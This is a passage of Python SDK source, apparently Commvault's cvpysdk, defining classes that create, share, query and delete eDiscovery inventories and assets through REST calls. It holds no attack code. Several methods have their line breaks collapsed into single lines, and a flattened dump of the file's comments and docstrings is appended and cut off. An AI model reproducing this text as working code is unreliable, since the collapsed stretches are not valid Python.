    **index_server_name**       --  returns the index server name associated with this inventory

    **index_server_cloud_id**   --  returns the index server cloud id associated with this inventory

    **inventory_name**          --  returns the inventory name

    **inventory_id**            --  returns the inventory id

    **security_associations**   --  returns the security associations blob of this inventory

    **schedule**                --  returns the schedule object associated with this inventory

    **data_source**             --  returns the DataSource object associated with this inventory

    **handler**                 --  returns the default handler object for this inventory

Assets:

    __init__()                  --  initialise object of the Assets class

    refresh()                   --  refresh the assets associated with inventory

    add()                       --  adds asset to the inventory

    get()                       --  returns the instance of Asset class based on given asset name

    has_asset()                 --  returns whether given asset exists or not in inventory

    delete()                    --  deletes the asset from the inventory

    _get_assets_properties()    --  returns the assets properties

    _response_not_success()     --  parses through the exception response, and raises SDKException

Assets Attributes
-----------------

    **assets**      --  returns the assets details as json

Asset:

    __init__()          --  initialise object of the Asset class

    _get_properties()   --  returns the properties of the asset

    refresh()           --  refresh the asset associated with inventory

    start_collection()  --  starts collection job on this asset

    get_job_history()   --  returns the job history details of this asset

    get_job_status()    --  returns the job status details of this asset

    get_asset_prop()    --  returns the asset property value for the given property name

Asset Attributes
----------------

    **asset_id**            --  returns the id of asset

    **asset_name**          --  returns the name of asset

    **asset_type**          --  returns the type of asset

    **crawl_start_time**    --  returns the last crawl start time of asset

    **asset_props**         --  returns the properties(name/value pair) of asset

    **asset_status**        --  returns the status of asset

    **inventory_id**        --  returns the inventory id of this asset

"""

import copy

from ..activateapps.ediscovery_utils import EdiscoveryClientOperations
from ..activateapps.constants import InventoryConstants
from ..schedules import Schedules
from ..exception import SDKException


class Inventories():
    """Class for representing all inventories in the commcell."""

    def __init__(self, commcell_object):
        """Initializes an instance of the Inventories class.

            Args:
                commcell_object     (object)    --  instance of the commcell class

            Returns:
                object  -   instance of the Inventories class

        """
        self._commcell_object = commcell_object
        self._update_response_ = commcell_object._update_response_
        self._cvpysdk_object = commcell_object._cvpysdk_object
        self._services = commcell_object._services
        # mapping of lower-cased inventory name -> inventory details dict; filled by refresh()
        self._inventories = None
        self._API_INVENTORIES = self._services['EDISCOVERY_INVENTORIES']
        self._API_DELETE_INVENTORY = self._services['EDISCOVERY_INVENTORY']
        self.refresh()

    def _response_not_success(self, response):
        """Helper function to raise an exception when response status is not 200 (OK).
Args: response (object) -- response class object, received upon running an API request, using the `requests` python package """ raise SDKException('Response', '101', self._update_response_(response.text)) def _get_inventories(self): """Gets all inventories from the commcell Args: None Return: list(dict) -- list Containing inventory details dict Raises: SDKException: if response is empty if response is not success """ output = {} flag, response = self._cvpysdk_object.make_request( 'GET', self._API_INVENTORIES ) if flag: if response.json() and 'inventoryList' in response.json(): inventories = response.json()['inventoryList'] for inventory in inventories: output[inventory['inventoryName'].lower()] = inventory return output raise SDKException('Inventory', '103') self._response_not_success(response) def add(self, inventory_name, index_server, name_server=None): """Adds inventory to the commcell with given inputs Args: inventory_name (str) -- Name of the inventory index_server (str) -- Index server name name_server (list) -- Name server assets which needs to be added to inventory Returns: object -- Instance of Inventory Class Raises: SDKException: if input data type is not valid if failed to add inventory if Index Server doesn't exists in commcell """ if not isinstance(inventory_name, str) or not isinstance(index_server, str): raise SDKException('Inventory', '101') req_json = copy.deepcopy(InventoryConstants.INVENTORY_ADD_REQUEST_JSON) if name_server: asset_json = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON) for server in name_server: asset_json['name'] = server req_json['assets'].append(asset_json) req_json['inventoryName'] = inventory_name if not self._commcell_object.index_servers.has(index_server): raise SDKException('Inventory', '102', "Given index server name not exists on this commcell") index_server_obj = self._commcell_object.index_servers.get(index_server) req_json['analyticsEngineCloud']['cloudId'] = index_server_obj.cloud_id 
req_json['analyticsEngineCloud']['cloudDisplayName'] = index_server_obj.cloud_name flag, response = self._cvpysdk_object.make_request( 'POST', self._API_INVENTORIES, req_json ) if flag: if response.json() and 'errorResp' in response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to create inventory with error [{err_resp['errorMessage']}]") elif 'inventoryList' in response.json(): inventory = response.json()['inventoryList'][0] inventory_id = inventory['inventoryId'] self.refresh() return Inventory(self._commcell_object, inventory_name, inventory_id) raise SDKException('Inventory', '102', f"Failed to create inventory with response - {response.json()}") raise SDKException('Inventory', '105') self._response_not_success(response) def delete(self, inventory_name): """Deletes the inventory from the commcell Args: inventory_name (str) -- Inventory name to be deleted Returns: None Raises: SDKException: if unable to find inventory if failed to delete inventory if input type is not valid """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') if not self.has_inventory(inventory_name): raise SDKException('Inventory', '106') flag, response = self._cvpysdk_object.make_request( 'DELETE', self._API_DELETE_INVENTORY % self._inventories[inventory_name.lower()]['inventoryId'] ) if flag: if response.json() and 'errorResp' in response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to Delete inventory with error [{err_resp['errorMessage']}]") self.refresh() else: raise SDKException('Inventory', '107') else: self._response_not_success(response) def refresh(self): """Refresh the inventories associated with the commcell.""" self._inventories = self._get_inventories() def get_properties(self, inventory_name): """Returns a properties of the specified 
Inventory Args: inventory_name (str) -- name of the inventory Returns: dict - properties for the given inventory name """ return self._inventories[inventory_name.lower()] def has_inventory(self, inventory_name): """Checks if a inventory exists in the commcell with the input name. Args: inventory_name (str) -- name of the inventory Returns: bool - boolean output to specify whether the inventory exists in the commcell or not Raises: SDKException: if type of the inventory name argument is not string """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') return self._inventories and inventory_name.lower() in map(str.lower, self._inventories) def get(self, inventory_name): """Returns a Inventory object for the given inventory name. Args: inventory_name (str) -- name of the inventory Returns: obj -- Object of Inventory class Raises: SDKException: if inventory doesn't exists in commcell if inventory_name is not of type string """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') if self.has_inventory(inventory_name): inventory_id = self._inventories[inventory_name.lower()]['inventoryId'] return Inventory(self._commcell_object, inventory_name, inventory_id) raise SDKException('Inventory', '106') class Inventory(): """Class for performing operations on a single inventory""" def __init__(self, commcell_object, inventory_name, inventory_id=None): """Initialize an object of the Inventory class. 
        Args:
            commcell_object     (object)    --  instance of the commcell class

            inventory_name      (str)       --  name of the Inventory

            inventory_id        (str)       --  id of Inventory

                default: None

        Returns:
            object  -   instance of the Inventory class

        """
        self._commcell_object = commcell_object
        self._update_response_ = commcell_object._update_response_
        self._services = commcell_object._services
        self._cvpysdk_obj = self._commcell_object._cvpysdk_object
        self._inventory_id = None
        self._inventory_name = inventory_name
        self._inventory_props = None
        self._index_server_name = None
        self._index_server_cloud_id = None
        self._security_associations = None
        self._schedule = None
        self._data_source = None
        self._handler = None
        self._API_GET_INVENTORY_DETAILS = self._services['EDISCOVERY_INVENTORY']
        self._API_SECURITY = self._services['SECURITY_ASSOCIATION']
        self._API_SECURITY_ENTITY = self._services['ENTITY_SECURITY_ASSOCIATION']
        self._API_GET_DEFAULT_HANDLER = self._services['EDISCOVERY_GET_DEFAULT_HANDLER']
        # resolve inventory id via inventory manager when the caller did not pass one
        if not inventory_id:
            self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id
        else:
            self._inventory_id = inventory_id
        self.refresh()
        self._ediscovery_client_obj = EdiscoveryClientOperations(class_object=self, commcell_object=commcell_object)

    def _response_not_success(self, response):
        """Helper function to raise an exception when response status is not 200 (OK).

            Args:
                response    (object)    --  response class object,
                    received upon running an API request, using the `requests` python package

        """
        raise SDKException('Response', '101', self._update_response_(response.text))

    def _get_inventory_properties(self):
        """Get inventory properties from the commcell

            Args:
                None

            Returns:
                dict    --  Properties of inventory

        """
        flag, response = self._cvpysdk_obj.make_request(
            'GET', self._API_GET_INVENTORY_DETAILS % self._inventory_id
        )
        if flag:
            if response.json() and 'inventoryList' in response.json():
                inventory_props = response.json()['inventoryList'][0]
                # cache frequently used fields so property accessors stay cheap
                self._index_server_name = inventory_props['analyticsEngineCloud']['cloudDisplayName']
                self._index_server_cloud_id = inventory_props['analyticsEngineCloud']['cloudId']
                self._inventory_name = inventory_props['inventoryName']
                self._security_associations = inventory_props['securityAssociation']['associations']
                return inventory_props
            raise SDKException('Inventory', '104')
        self._response_not_success(response)

    def refresh(self):
        """Refresh the inventory details for associated object"""
        self._inventory_props = self._get_inventory_properties()
        self._schedule = self._get_schedule_object()
        self._data_source, self._handler = self._get_data_source_handler_object()

    def get_assets(self):
        """Returns the Assets class instance for this inventory

            Args:
                None

            Returns:
                object  --  Instance of Assets class

        """
        return Assets(self._commcell_object, self.inventory_name, self.inventory_id)

    def start_collection(self):
        """Starts collection job on this inventory

            Args:
                None

            Returns:
                None

            Raises:
                SDKException:

                    if failed to start collection job

        """
        return self._ediscovery_client_obj.start_job()

    def share(self, user_or_group_name, allow_edit_permission=False, is_user=True, ops_type=1):
        """Shares inventory with given user or user group in commcell

            Args:
                user_or_group_name      (str)   --  Name of user or group

                is_user                 (bool)  --  Denotes whether this is user or group name
                                                        default : True (User)

                allow_edit_permission   (bool)  --  whether to give edit permission or not to user or group

                ops_type                (int)   --  Operation type
                                                        Default : 1 (Add)
                                                        Supported : 1 (Add)
                                                                    3 (Delete)

            Returns:
                None

            Raises:
                SDKException:

                    if unable to update security associations

                    if response is empty or not success

        """
        if not isinstance(user_or_group_name, str):
            raise SDKException('Inventory', '101')
        request_json = copy.deepcopy(InventoryConstants.INVENTORY_SHARE_REQUEST_JSON)
        external_user = False
        association_response = None
        # on Add with existing associations, fetch the current security blob first so
        # it can be re-sent alongside the new association (the API overwrites the list)
        if ops_type == 1 and len(self.security_associations) > 1:
            association_request_json = copy.deepcopy(InventoryConstants.INVENTORY_SHARE_REQUEST_JSON)
            del association_request_json['securityAssociations']
            association_request_json['entityAssociated']['entity'][0]['seaDataSourceId'] = int(self.inventory_id)
            # get security blob for this data source type entity - 132
            flag, response = self._cvpysdk_obj.make_request(
                'GET', self._API_SECURITY_ENTITY % (132, int(self.inventory_id)), association_request_json
            )
            if flag:
                if response.json() and 'securityAssociations' in response.json():
                    association_response = response.json(
                    )['securityAssociations'][0]['securityAssociations']['associations']
                else:
                    raise SDKException('Inventory', '102', 'Failed to get existing security associations')
            else:
                response_string = self._commcell_object._update_response_(response.text)
                raise SDKException('Response', '101', response_string)
        # a backslash in the name marks an external (domain) user/group account
        if '\\' in user_or_group_name:
            external_user = True
        if is_user:
            user_obj = self._commcell_object.users.get(user_or_group_name)
            user_id = user_obj.user_id
            request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userId'] = int(user_id)
            request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "13"
            request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userName'] = user_or_group_name
        elif external_user:
            request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['groupId'] = 0
            request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "62"
            request_json['securityAssociations']['associations'][0]['userOrGroup'][0][
                'externalGroupName'] = user_or_group_name
        else:
            grp_obj = self._commcell_object.user_groups.get(user_or_group_name)
            grp_id = grp_obj.user_group_id
            request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userGroupId'] = int(grp_id)
            request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "15"
            request_json['securityAssociations']['associations'][0]['userOrGroup'][0][
                'userGroupName'] = user_or_group_name
        request_json['entityAssociated']['entity'][0]['seaDataSourceId'] = self.inventory_id
        request_json['securityAssociations']['associationsOperationType'] = ops_type
        if allow_edit_permission:
            request_json['securityAssociations']['associations'][0]['properties']['categoryPermission']['categoriesPermissionList'].append(
                InventoryConstants.EDIT_CATEGORY_PERMISSION)
        # Associate existing associations to the request
        if ops_type == 1 and len(self.security_associations) > 1:
            request_json['securityAssociations']['associations'].extend(association_response)
        flag, response = self._cvpysdk_obj.make_request(
            'POST', self._API_SECURITY, request_json
        )
        if flag:
            if response.json() and 'response' in response.json():
                response_json = response.json()['response'][0]
                error_code = response_json['errorCode']
                if error_code != 0:
                    error_message = response_json['errorString']
                    raise SDKException(
                        'Inventory', '102', error_message)
                # update association list by refreshing inventory
                self.refresh()
            else:
                raise SDKException('Inventory', '111')
        else:
            response_string = self._commcell_object._update_response_(response.text)
            raise SDKException('Response', '101', response_string)

    def _get_data_source_handler_object(self):
        """returns the data source and handler object associated with this inventory

            Args:
                None

            Returns:
                obj,obj     --  Instance of DataSource object, Instance of Handler object

            Raises:
                SDKException:

                    if failed to get datasource or handler details

        """
        flag, response = self._cvpysdk_obj.make_request(
            'GET', self._API_GET_DEFAULT_HANDLER % self.inventory_id)
        if flag:
            if response.json() and 'handlerInfos' in response.json():
                handler_list = response.json()['handlerInfos']
                if not isinstance(handler_list, list):
                    raise SDKException('Inventory', '102', "Failed to get Datasource/Handler details")
                # first handler entry is the default handler for this inventory's datasource
                handler_details = handler_list[0]
                ds_name = handler_details['dataSourceName']
                handler_name = handler_details['handlerName']
                ds_obj = self._commcell_object.datacube.datasources.get(ds_name)
                handler_obj = ds_obj.ds_handlers.get(handler_name)
                return ds_obj, handler_obj
            raise SDKException('Inventory', '102', 'Unknown response while fetching datasource details')
        response_string = self._commcell_object._update_response_(response.text)
        raise SDKException('Response', '101', response_string)

    def _get_schedule_object(self):
        """Returns the schedule class object of schedule associated to this inventory

            Args:
                None

            Returns:
                object  --  Instance of Schedule class

            Raises:
                SDKException:

                    if failed to find schedule

        """
        return Schedules(self).get()

    def get_inventory_data(self, handler_filter=""):
        """Executes handler for fetching data from inventory

            Args:
                handler_filter      (str)   --  Filter which needs to applied for handler execution

            Returns:
                dict    --  Dictionary of values fetched from handler execution

            Raises:
                SDKException:

                    if error in fetching handler data

                    if input is not valid

        """
        if not isinstance(handler_filter, str):
            raise SDKException('Inventory', '101')
        if not self._handler:
            raise SDKException('Inventory', '102', 'No handler object initialised')
        return self._handler.get_handler_data(handler_filter=handler_filter)

    @property
    def properties(self):
        """Returns the properties of this inventory as dict"""
        return self._inventory_props

    @property
    def index_server_name(self):
        """Returns the index server name associated with this inventory"""
        return self._index_server_name

    @property
    def index_server_cloud_id(self):
        """Returns the index server id associated with this inventory"""
        return self._index_server_cloud_id

    @property
    def inventory_id(self):
        """Returns the inventory id associated with this inventory"""
        return self._inventory_id

    @property
    def inventory_name(self):
        """Returns the inventory name associated with this inventory"""
        return self._inventory_name

    @property
    def security_associations(self):
        """Returns the security blob associated with this inventory"""
        return self._security_associations

    @property
    def schedule(self):
        """Returns the schedule class object for schedule associated with this inventory"""
        return self._schedule

    @property
    def data_source(self):
        """Returns the DataSource class object for datasource associated with this inventory"""
        return self._data_source

    @property
    def handler(self):
        """Returns the Handler class object for default handler associated with this inventory"""
        return self._handler


class Assets():
    """Class to represent all assets in an inventory"""

    def __init__(self, commcell_object, inventory_name, inventory_id=None):
        """Initialize an object of the Assets class.
        Args:
            commcell_object     (object)    --  instance of the commcell class

            inventory_name      (str)       --  name of the Inventory

            inventory_id        (str)       --  id of Inventory

                default: None

        Returns:
            object  -   instance of the Assets class

        """
        self._commcell_object = commcell_object
        self._update_response_ = commcell_object._update_response_
        self._services = commcell_object._services
        self._cvpysdk_obj = self._commcell_object._cvpysdk_object
        self._inventory_id = None
        self._inventory_name = inventory_name
        # resolve inventory id via inventory manager when the caller did not pass one
        if not inventory_id:
            self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id
        else:
            self._inventory_id = inventory_id
        # mapping of lower-cased asset name -> asset details dict; filled by refresh()
        self._assets = None
        self._API_INVENTORIES = self._services['EDISCOVERY_INVENTORIES']
        self._API_ASSETS = self._services['EDISCOVERY_ASSETS']
        self.refresh()

    def _get_assets_properties(self):
        """gets the assets properties from inventory

            Args:
                None

            Returns:
                dict    --  containing asset properties, keyed by lower-cased asset name

        """
        inv_mgr = self._commcell_object.activate.inventory_manager()
        inv_obj = inv_mgr.get(self._inventory_name)
        # refresh the inventory so the asset list reflects the latest backend state
        inv_obj.refresh()
        assets = {}
        for asset in inv_obj.properties['assets']:
            name = asset['name'].lower()
            assets[name] = asset
        return assets

    def refresh(self):
        """Refresh the assets details associated with this inventory"""
        self._assets = self._get_assets_properties()

    def _response_not_success(self, response):
        """Helper function to raise an exception when response status is not 200 (OK).

            Args:
                response    (object)    --  response class object,
                    received upon running an API request, using the `requests` python package

        """
        raise SDKException('Response', '101', self._update_response_(response.text))

    def has_asset(self, asset_name):
        """Checks whether given asset exists in inventory or not

            Args:
                asset_name      (str)   --  Name of the asset

            Returns:
                bool    --  true if asset exists else false

        """
        # _assets keys are stored lower-cased, so the lookup is case-insensitive
        return self._assets and asset_name.lower() in self._assets

    def get(self, asset_name):
        """Returns the asset object

            Args:
                asset_name      (str)   --  Name of the asset

            Returns:
                object  --  Instance of Asset class

            Raises:
                SDKException:

                    if input is not valid

                    if asset doesn't exists in inventory

        """
        if not isinstance(asset_name, str):
            raise SDKException('Inventory', '101')
        if not self.has_asset(asset_name):
            raise SDKException('Inventory', '109')
        return Asset(self._commcell_object, self._inventory_name, asset_name, self._inventory_id)

    def add(self, asset_name, asset_type=InventoryConstants.AssetType.NAME_SERVER, **kwargs):
        """Adds asset to the inventory

            Args:
                asset_name      (str)   --  Name of the asset

                asset_type      (Enum)  --  type of asset
                        (Refer to InventoryConstants.AssetType class)

            Kwargs (for FILE SERVER type asset):

                fqdn            --  File server FQDN

                os              --  File Server OS type

                ip              --  File server IP

                country_code    --  Country code (ISO 3166 2-letter code)

                country_name    --  Country name

                domain          --  File Server Domain name (optional)

            Returns:
                object  --  Instance of Asset class

            Raises:
                SDKException:

                    if input is not valid

                    if failed to add asset to inventory

        """
        if not isinstance(asset_name, str) or not isinstance(asset_type, InventoryConstants.AssetType):
            raise SDKException('Inventory', '101')
        request_json = copy.deepcopy(InventoryConstants.ASSET_ADD_TO_INVENTORY_JSON)
        request_json['inventoryId'] = int(self._inventory_id)
        asset_json = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON)
        asset_json['name'] = asset_name
        asset_json['type'] = asset_type.value
        property_json = copy.deepcopy(InventoryConstants.ASSET_PROPERTY_JSON)
        # file-server assets carry extra name/value properties; name-server assets do not
        if asset_type.value == InventoryConstants.AssetType.FILE_SERVER.value:
            for prop in InventoryConstants.ASSET_FILE_SERVER_PROPERTY:
                prop_name = InventoryConstants.FIELD_PROPS_MAPPING[prop]
                default_value = ""
                if prop_name not in kwargs:
                    # if domain is not passed, then form domain from fqdn
                    # NOTE(review): assumes the 'fqdn' kwarg is present and dotted — verify callers
                    if prop == InventoryConstants.FIELD_PROPERTY_DOMAIN:
                        default_value = kwargs.get(InventoryConstants.KWARGS_FQDN)
                        default_value = default_value.split(".", 1)[1]
                    # always use asset name as file server name
                    if prop == InventoryConstants.FIELD_PROPERTY_NAME:
                        default_value = asset_name
                prop_json = copy.deepcopy(InventoryConstants.ASSET_PROPERTY_NAME_VALUE_PAIR_JSON)
                prop_json['name'] = prop
                prop_json['value'] = kwargs.get(prop_name, default_value)
                property_json['propertyValues']['nameValues'].append(prop_json)
            # merge the collected properties into the asset entry
            asset_json.update(property_json)
        request_json['assets'].append(asset_json)
        flag, response = self._cvpysdk_obj.make_request(
            'PUT', self._API_INVENTORIES, request_json)
        if flag:
            if response.json() and 'errorResp' in response.json():
                err_resp = response.json()['errorResp']
                if 'errorCode' in err_resp and err_resp['errorCode'] != 0:
                    raise SDKException(
                        'Inventory', '102',
                        f"Failed to add asset to inventory with error [{err_resp['errorMessage']}]")
                self.refresh()
                return Asset(self._commcell_object, self._inventory_name, asset_name, self._inventory_id)
            raise SDKException('Inventory', '108')
        self._response_not_success(response)

    def delete(self, asset_name):
        """Delete the asset from the inventory

            Args:
                asset_name      (str)   --  Name of the asset

            Returns:
                None

            Raises:
                SDKException:

                    if input is not valid

                    if failed to delete the asset

                    if unable to find this asset in inventory

        """
        if not isinstance(asset_name, str):
            raise SDKException('Inventory', '101')
        if not self.has_asset(asset_name):
            raise SDKException('Inventory', '109')
        request_json = copy.deepcopy(InventoryConstants.ASSET_DELETE_FROM_INVENTORY_JSON)
        request_json['inventoryId'] = int(self._inventory_id)
        if 'assetId' in self._assets[asset_name.lower()]:
            request_json['assets'].append({'assetId': self._assets[asset_name.lower()]['assetId']})
        else:
            req = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON)
            asset_obj = self.get(asset_name)
            asset_type = asset_obj.asset_type
            # for file server asset, asset name will not be display name in backend delete request. so fetch fqdn
            req['name'] = asset_obj.get_asset_prop(prop_name=InventoryConstants.FIELD_PROPERTY_DNSHOST)
            req['type'] = asset_type
            request_json['assets'].append(req)
        flag, response = self._cvpysdk_obj.make_request(
            'PUT', self._API_ASSETS % self._inventory_id, request_json)
        if flag:
            if response.json():
                # NOTE(review): 'errorResp' is accessed unguarded here, unlike add() — confirm
                # the backend always includes it on a 200 delete response
                err_resp = response.json()['errorResp']
                if 'errorCode' in err_resp and err_resp['errorCode'] != 0:
                    raise SDKException(
                        'Inventory', '102',
                        f"Failed to delete asset from inventory with error [{err_resp['errorMessage']}]")
                self.refresh()
                return
            raise SDKException('Inventory', '110')
        self._response_not_success(response)

    @property
    def assets(self):
        """Returns the assets details associated with this inventory"""
        return self._assets


class Asset():
    """Class to represent single asset in an inventory"""

    def __init__(self, commcell_object, inventory_name, asset_name, inventory_id=None):
        """Initialize an object of the Asset class.
Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory asset_name (str) -- Name of the asset inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Asset class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._services = commcell_object._services self._cvpysdk_obj = self._commcell_object._cvpysdk_object self._inventory_id = None self._inventory_name = inventory_name if not inventory_id: self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id else: self._inventory_id = inventory_id self._asset_name = asset_name self._asset_props = None self._asset_id = None self._crawl_start_time = None self._asset_type = None self._asset_status = None self._asset_name_values_props = None self.refresh() self._ediscovery_client_obj = EdiscoveryClientOperations(class_object=self, commcell_object=commcell_object) def _get_properties(self): """Returns the properties of this asset Args: None Returns: dict -- Containing properties of asset """ inv_mgr = self._commcell_object.activate.inventory_manager() inv_obj = inv_mgr.get(self._inventory_name) inv_obj.get_assets().refresh() for asset in inv_obj.properties['assets']: if asset['name'].lower() == self._asset_name.lower(): # for file server, we will not have asset id & crawl times self._asset_id = asset.get('assetId', 0) self._crawl_start_time = asset.get('crawlStartTime', 0) self._asset_type = asset.get('type', 0) self._asset_status = asset['status'] self._asset_name = asset['name'] self._asset_name_values_props = asset['propertyValues']['nameValues'] return asset return {} def refresh(self): """Refresh the asset details associated with this""" self._asset_props = self._get_properties() def get_job_history(self): """Returns the job history details of this asset Args: None Returns: list(dict) -- containing job history details Raises: SDKException: 
if failed to get job history if asset is not supported for this operation """ if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value: raise SDKException('Inventory', '102', "Not supported other than Name Server asset type") return self._ediscovery_client_obj.get_job_history() def get_job_status(self): """Returns the job status details of this asset Args: None Returns: dict -- containing job status details Raises: SDKException: if failed to get job status if asset is not supported for this operation """ if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value: raise SDKException('Inventory', '102', "Not supported other than Name Server asset type") return self._ediscovery_client_obj.get_job_status() def start_collection(self, wait_for_job=False, wait_time=60): """Starts collection job on this asset Args: wait_for_job (bool) -- specifies whether to wait for job to complete or not wait_time (int) -- time interval to wait for job completion in Mins Default : 60Mins Return: None Raises: SDKException: if failed to start collection job if asset is not supported for this operation """ if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value: raise SDKException('Inventory', '102', "Not supported other than Name Server asset type") return self._ediscovery_client_obj.start_job(wait_for_job=wait_for_job, wait_time=wait_time) def get_asset_prop(self, prop_name): """returns the property value for given property name for this asset Args: prop_name (str) -- Name of the property Returns: str -- Value of the property """ for prop in self._asset_name_values_props: name = prop['name'] if name == prop_name: return prop['value'] return "" @property def asset_id(self): """Returns the asset id with this asset""" return self._asset_id @property def asset_name(self): """Returns the asset name with this asset""" return self._asset_name @property def crawl_start_time(self): """Returns the crawl start time with this asset""" return self._crawl_start_time 
@property def asset_type(self): """Returns the asset type for this asset""" return self._asset_type @property def asset_status(self): """Returns the asset status for this asset""" return self._asset_status @property def asset_props(self): """Returns the property values for this asset""" return self._asset_name_values_props @property def inventory_id(self): """Returns the inventory id for this asset""" return self._inventory_id
en
0.641736
# -*- coding: utf-8 -*- # -------------------------------------------------------------------------- # Copyright Commvault Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # -------------------------------------------------------------------------- Main file for performing operations on inventory manager app under Activate. Inventories, Inventory, Assets & Asset are the four classes defined in this file Inventories: class for representing all inventories in the commcell Inventory: class for representing a single inventory in the commcell Assets: class for representing all assets in an inventory Asset: class to represent single asset in an inventory Inventories: __init__() -- initialise object of the Inventories class _get_inventories() -- Gets all inventories in the commcell _response_not_success() -- parses through the exception response, and raises SDKException refresh() -- refresh the Inventories from the commcell get_properties() -- returns the properties for given inventory name has_inventory() -- Checks if a given inventory name exists in the commcell or not get() -- returns the Inventory class object for given inventory name add() -- add inventory to the commcell delete() -- delete inventory from the commcell Inventory: __init__() -- initialise object of the Inventory class _response_not_success() -- parses through the exception response, and raises SDKException _get_inventory_properties() -- Gets all the properties of this inventory _get_schedule_object() -- 
returns the schedule class object associated to this inventory _get_data_source_handler_object() -- returns the datasource and default handler object for this inventory refresh() -- refresh the properties of the inventory get_assets() -- returns the Assets class object for this inventory share() -- shares inventory with other user or user group start_collection() -- starts collection job on this inventory get_inventory_data() -- returns data from inventory Inventory Attributes ----------------- **properties** -- returns properties of the inventory **index_server_name** -- returns the index server name associated with this inventory **_index_server_cloud_id** -- returns the index server cloudid associated with this inventory **inventory_name** -- returns the inventory name **inventory_id** -- returns the inventory id **security_associations** -- returns the security associations blob of this inventory **schedule** -- returns the schedule object associated with this inventory **data_source** -- returns the DataSource object associated with this inventory **handler** -- returns the default handler object for this inventory Assets: __init__() -- initialise object of the Assets class refresh() -- refresh the assets associated with inventory add() -- adds asset to the inventory get() -- returns the instance of Asset class based on given asset name has_asset() -- returns whether given asset exists or not in inventory delete() -- deletes the asset from the inventory _get_assets_properties() -- returns the assets properties _response_not_success() -- parses through the exception response, and raises SDKException Assets Attributes: ---------------- **assets** -- returns the assets details as json Asset: __init__() -- initialise object of the Asset class _get_properties() -- returns the properties of the asset refresh() -- refresh the asset associated with inventory start_collection() -- starts collection job on this asset get_job_history() -- returns the job history details 
of this asset get_job_status() -- returns the job status details of this asset get_asset_prop() -- returns the asset property value for the given property name Asset Attributes: ----------------- **asset_id** -- returns the id of asset **asset_name** -- returns the name of asset **asset_type** -- returns the type of asset **crawl_start_time** -- returns the last crawl start time of asset **asset_props** -- returns the properties(name/value pair) of asset **asset_status** -- returns the status of asset **inventory_id** -- returns the inventory id of this asset Class for representing all inventories in the commcell. Initializes an instance of the Inventories class. Args: commcell_object (object) -- instance of the commcell class Returns: object - instance of the Inventories class Helper function to raise an exception when reponse status is not 200 (OK). Args: response (object) -- response class object, received upon running an API request, using the `requests` python package Gets all inventories from the commcell Args: None Return: list(dict) -- list Containing inventory details dict Raises: SDKException: if response is empty if response is not success Adds inventory to the commcell with given inputs Args: inventory_name (str) -- Name of the inventory index_server (str) -- Index server name name_server (list) -- Name server assets which needs to be added to inventory Returns: object -- Instance of Inventory Class Raises: SDKException: if input data type is not valid if failed to add inventory if Index Server doesn't exists in commcell Deletes the inventory from the commcell Args: inventory_name (str) -- Inventory name to be deleted Returns: None Raises: SDKException: if unable to find inventory if failed to delete inventory if input type is not valid Refresh the inventories associated with the commcell. 
Returns a properties of the specified Inventory Args: inventory_name (str) -- name of the inventory Returns: dict - properties for the given inventory name Checks if a inventory exists in the commcell with the input name. Args: inventory_name (str) -- name of the inventory Returns: bool - boolean output to specify whether the inventory exists in the commcell or not Raises: SDKException: if type of the inventory name argument is not string Returns a Inventory object for the given inventory name. Args: inventory_name (str) -- name of the inventory Returns: obj -- Object of Inventory class Raises: SDKException: if inventory doesn't exists in commcell if inventory_name is not of type string Class for performing operations on a single inventory Initialize an object of the Inventory class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Inventory class Helper function to raise an exception when reponse status is not 200 (OK). 
Args: response (object) -- response class object, received upon running an API request, using the `requests` python package Get inventory properties from the commcell Args: None Returns: dict -- Properties of inventory Refresh the inventory details for associated object Returns the Assets class instance for this inventory Args: None Returns: object -- Instance of Assets class Starts collection job on this inventory Args: None Return: None Raises: SDKException: if failed to start collection job Shares inventory with given user or user group in commcell Args: user_or_group_name (str) -- Name of user or group is_user (bool) -- Denotes whether this is user or group name default : True(User) allow_edit_permission (bool) -- whether to give edit permission or not to user or group ops_type (int) -- Operation type Default : 1 (Add) Supported : 1 (Add) 3 (Delete) Returns: None Raises: SDKException: if unable to update security associations if response is empty or not success # get security blob for this data source type entity - 132 # Associate existing associations to the request # update association list by refreshing inventory returns the data source and handler object associated with this inventory Args: None Returns: obj,obj -- Instance of DataSource object,Instance of Handler object Raises: SDKException: if failed to get datasource or handler details Returns the schedule class object of schedule associated to this inventory Args: None Returns: object -- Instance of Schedule class Raises: SDKException: if failed to find schedule Executes handler for fetching data from inventory Args: 